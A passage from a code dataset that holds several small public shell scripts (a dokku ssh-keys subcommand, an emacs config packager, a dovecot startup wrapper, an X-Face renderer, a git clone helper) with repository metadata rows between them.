echo "The command \"$(basename "$0")\" should not be executed as root or via sudo directly."
echo "When a command requires root access, you will be prompted for a password as needed."
exit 1
fi
#
# Script execution
#
if [[ ! -d "$STORAGE_PREFERENCES_DIR" ]]; then
e_header "Warming up"
create_directory "$STORAGE_PREFERENCES_DIR"
fi
e_header "Displaying preference menus"
show_preferences_menu main
e_success "Saved main preferences"
MAIN_PREFERENCES=$(read_preferences main)
for item in ${MAIN_PREFERENCES[@]}; do
show_preferences_menu "$item"
e_success "Saved $item preferences"
done
if [[ -z "$MAIN_INSTALL_SCRIPT" ]]; then
e_header "What's next?"
e_arrow "Run 'exo-software-install' to install the selected software"
fi
| true
|
945875a5e3a20fefff068231407026d2963cb505
|
Shell
|
srr013/dokku
|
/plugins/ssh-keys/subcommands/list
|
UTF-8
| 404
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -eo pipefail
[[ $DOKKU_TRACE ]] && set -x
source "$PLUGIN_CORE_AVAILABLE_PATH/common/functions"
source "$PLUGIN_AVAILABLE_PATH/ssh-keys/functions"
cmd-ssh-keys-list() {
declare desc="List ssh key hashes"
declare cmd="ssh-keys:list"
[[ "$1" == "$cmd" ]] && shift 1
declare SSH_NAME="$1"
verify_ssh_key_file
sshcommand list dokku "$SSH_NAME"
}
cmd-ssh-keys-list "$@"
| true
|
5758027c9433cc35db2e3c67a8561a265748e62c
|
Shell
|
mariusae/make-emacs
|
/make-emacs
|
UTF-8
| 1,143
| 4.09375
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Make a standalone emacs configuration.
set -e
if [ $# -ne 2 ]; then
echo "`basename $0` <emacs.d-directory|emacs-init-file> <output file>" \
> /dev/null 1>&2
exit 1
fi
if which md5sum > /dev/null; then
MD5=md5sum
else
MD5=md5
fi
EMACSD=$1
OUTPUT=$2
# Force absolute path for $OUTPUT.
OUTPUT=$(cd `dirname $OUTPUT`; echo $PWD/`basename $OUTPUT`)
if [ -d $EMACSD ]; then
cd $EMACSD
UNIQUE=`find . \! -name '*.elc' -ls | $MD5`
INIT="init.el"
FILES=`find . \! -name '*.elc' -print`
else
UNIQUE=`$MD5 < $EMACSD`
INIT=$EMACSD
FILES=$EMACSD
fi
UNIQUE=${UNIQUE:0:6}
shar $FILES \
| sed -e "1 i\\
DIR=/tmp/emacs.$UNIQUE; if [ -d \$DIR ] ; then emacs -q -l \$DIR/$INIT \"\$@\"; exit; fi; echo \"extracting emacs.d..\"; OLDDIR=\$PWD; mkdir -p \$DIR; cd \$DIR" \
| sed -e "1 i\\
UNIQUE=$UNIQUE" \
| sed -e '1 i\
#!/bin/sh' \
| sed -e '/^exit/,$ d' \
| sed -e "$ a\\
cd \$OLDDIR; emacs -q -l \$DIR/$INIT \"\$@\"" \
| sed -e 's/^echo . .*//' \
> $OUTPUT
chmod 0744 $OUTPUT
| true
|
b1011a09c66d19b59ad787600d7b48430ba59efc
|
Shell
|
dockerpirate/dovecot
|
/rootfs/usr/local/bin/dovecot-wrapper
|
UTF-8
| 727
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/sh
# Parse dovecot version string from the APK database
DOVECOT_VERSION_STRING="$(
awk -- '
BEGIN {
PKGID = ""
PKGNAM = ""
PKGVER = ""
FS = ":"
}
{
if($1 == "C") {
PKGID = $2
} else if($1 == "P") {
PKGNAM = $2
} else if($1 == "V") {
PKGVER = $2
}
if(PKGID && PKGNAM && PKGVER) {
if(PKGNAM == "dovecot") {
print PKGNAM "-" PKGVER "." PKGID
}
PKGID = ""
PKGNAM = ""
PKGVER = ""
}
}
' /lib/apk/db/installed)"
# Re-run dovecot post-install script (to generate the TLS certificates if they're missing)
tar -xf "/lib/apk/db/scripts.tar" "${DOVECOT_VERSION_STRING}.post-install" -O | sh
# Start Dovecot as usual
exec dovecot -F
| true
|
60b16cbc4344aeefdc1aeb5dc92f36d09545a5c4
|
Shell
|
ryanmorillo/dotfiles
|
/mutt/scripts/x-face-unicode
|
UTF-8
| 1,451
| 3.671875
| 4
|
[] |
no_license
|
#! /bin/bash
#
# Read a mail message on stdin and output X-Face using unicode block
# characters. Makes the output a 24x24 text block.
# You obviously need a font that supports those.
#
# Created by Patrice Levesque in 2008, donated to the public domain.
# Set this to 0 or 1 depending on your preference
INVERSE=1
UNCOMPFACE=`which uncompface` || exit
PRINTF=`which printf` || exit
SED=`which sed` || exit
SEQ=`which seq` || exit
CUT=`which cut` || exit
COUNT=0;
for i in 00a0 259d 2598 2580 2597 2590 259a 259c 2596 259e 258c 259b 2584 259f 2599 2588; do
UNICHAR[$COUNT]=`${PRINTF} "\u$i"`
let "COUNT += 1"
done
ODDLINES=
EVENLINES=
TOTALCOUNT=0
ARRAYCOUNT=0
for i in `cat "$@" \
| ${SED} -n -e '/^X-Face:/,/^[^ \t]/ p' \
| ${SED} -n -e 's/^X-Face://' -e '/^[ \t]/ p' \
| ${SED} -e 's/^[ \t]\+//' \
| { ${UNCOMPFACE}; }`; do
if [ $(( $TOTALCOUNT % 2 )) -eq 0 ]; then
EVENLINES[$ARRAYCOUNT]="$i";
else
ODDLINES[$ARRAYCOUNT]="$i";
let "ARRAYCOUNT += 1"
fi
let "TOTALCOUNT += 1"
done
for line in `${SEQ} 0 23`; do
for word in `${SEQ} 1 3`; do
EVEN=$( ${PRINTF} "%d" `echo ${EVENLINES[$line]} | ${CUT} -d, -f$word` )
ODD=$( ${PRINTF} "%d" `echo ${ODDLINES[$line]} | ${CUT} -d, -f$word` )
# We need two bits. Shift then OR, then merge the two lines
for i in `${SEQ} 14 -2 0`; do
T=$((((($ODD >> $i ) & 3) << 2) + (($EVEN >> $i) & 3)))
[[ ${INVERSE} -eq 1 ]] && let "T ^= 15"
echo -n ${UNICHAR[$T]}
done;
done;
echo
done
| true
|
15dace9debd9c1028d93dd1070f2dffd3d846bbb
|
Shell
|
andrewkeller/ak-git-tools
|
/bin/git-repocache-clone-by-name
|
UTF-8
| 1,180
| 4.09375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# git-repocache-clone-by-name
#
# Copyright (c) 2013 - 2014, Andrew Keller
#
# A wrapper around git-clone that allows the user to specify the URI of the
# repository using the name of a remote in the repocache instead of the URI
# itself. The repocache is also used for the clone. For example, one may type:
#
# git repocache-clone-by-name <remote name> <additional-git-clone-args>
#
# The name of the remote must be the first argument. Any additional arguments
# are passed to git-clone.
REPOCACHE_DIR=$(git repocache-path) || exit $?
if [ $# -lt 1 ]
then
echo "usage: `basename \"$0\"` <repository name> <additional git-clone args>" >&2
exit 1
fi
REPO_NAME=$1
shift
REPO_URL=$(git --git-dir "$REPOCACHE_DIR" config --get "remote.$REPO_NAME.url")
if [ -z "$REPO_URL" ]
then
echo "`basename \"$0\"`: unknown repository name: '$REPO_NAME'.
Must be one of:
`git --git-dir \"$REPOCACHE_DIR\" remote | perl -pne '$_=" $_";'`" >&2
exit 1
fi
git clone --reference "$REPOCACHE_DIR" "$REPO_URL" "$@" || exit $?
echo "
Warning: The cloned repository does not own all its objects.
You should run \`git disconnect-alternates\` as soon
as possible.
" >&2
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.